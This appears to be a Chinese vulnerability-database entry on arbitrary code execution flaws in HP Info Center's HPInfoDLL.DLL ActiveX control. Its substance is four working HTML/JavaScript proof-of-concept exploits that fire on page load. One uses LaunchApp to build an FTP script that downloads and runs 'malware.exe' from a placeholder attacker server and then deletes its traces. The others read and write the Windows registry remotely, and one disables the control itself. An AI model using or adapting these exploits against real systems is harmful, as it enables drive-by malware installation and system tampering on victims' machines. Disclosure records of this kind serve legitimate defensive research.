HP Info Center HPInfoDLL.DLL ActiveX控件多个任意代码执行漏洞

基本字段

漏洞编号：: SSV-2599

披露/发现时间：: 未知

提交时间：: 2007-12-14

漏洞等级：

漏洞类别：: 嵌入恶意代码

影响组件：: (1.0.1.1)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.2KB

/////////////////////////////////// //Remote code execution PoC exploit /////////////////////////////////// <html> <head> <script language="JavaScript"> var attackersFtpServerAddress="attacker.ftp.server"; var attackersFtpUname="IDidntDoAnything"; var attackersFtpPassword="password"; var executableFileName="malware.exe"; var cnt,p; function spawn2() { o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo open "+attackersFtpServerAddress+ " >> c:\\ftpd&echo "+attackersFtpUname+">> c:\\ftpd&echo "+attackersFtpPassword+ ">> c:\\ftpd&echo binary>> c:\\ftpd&echo get "+executableFileName+ "c:\\"+executableFileName+" >> c:\\ftpd&echo quit>> c:\\ftpd",0); o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo cd c:\\>> c:\\ftpd.bat"+ "&echo ftp -s:ftpd>> c:\\ftpd.bat&echo start c:\\"+executableFileName+ " >> c:\\ftpd.bat",0); o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C c:\\ftpd.bat&del "+ "c:\\ftpd.bat&del c:\\ftpd&del c:\\"+executableFileName,0); } </script> </head> <body onload="spawn2()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" </object> </body> </html> ///////////////////////////////////////// //Remote system registry read PoC exploit ///////////////////////////////////////// <html> <head> <script language="JavaScript"> var hKey; var sectionName; var keyName; ProcessRegistryData(parm) { alert(parm); } function spawn2() { var ret=o2obj.GetRegValue(hKey,sectionName,keyName); ProcessRegistryData(ret); } </script> </head> <body onload="spawn2()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" </object> </body> </html> /////////////////////////////////////////// //Remote system registry write PoC exploit /////////////////////////////////////////// <html> <head> <script language="JavaScript"> var hKey; var sectionName; var keyName; var newKeyValue; function spawn2() { var ret=o2obj.SetRegValue(hKey,sectionName,keyName,newKeyValue); } </script> </head> <body onload="spawn2()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" </object> </body> </html> //////////////////// // harakiri exploit //////////////////// <html> <head> <script language="JavaScript"> function spawn2() { var ret=hpinfo.SetRegValue("HKEY_LOCAL_MACHINE", "SOFTWARE\\Classes\\CLSID\\"+ "{62DDEB79-15B2-41E3-8834-D3B80493887A}\\InprocServer32","",""); } </script> </head> <body onload="spawn2()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" </object> </body> </html>

共 1 兑换

参考链接

http://www.securityfocus.com/archive/1/484880

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC

生命线

发现/披露了漏洞
2007-12-14 提交了漏洞
2007-12-14 提交补充了漏洞详情
2007-12-14 提交更新了 PoC

HP Info Center HPInfoDLL.DLL ActiveX控件多个任意代码执行漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

HP Info Center HPInfoDLL.DLL ActiveX控件多个任意代码执行漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定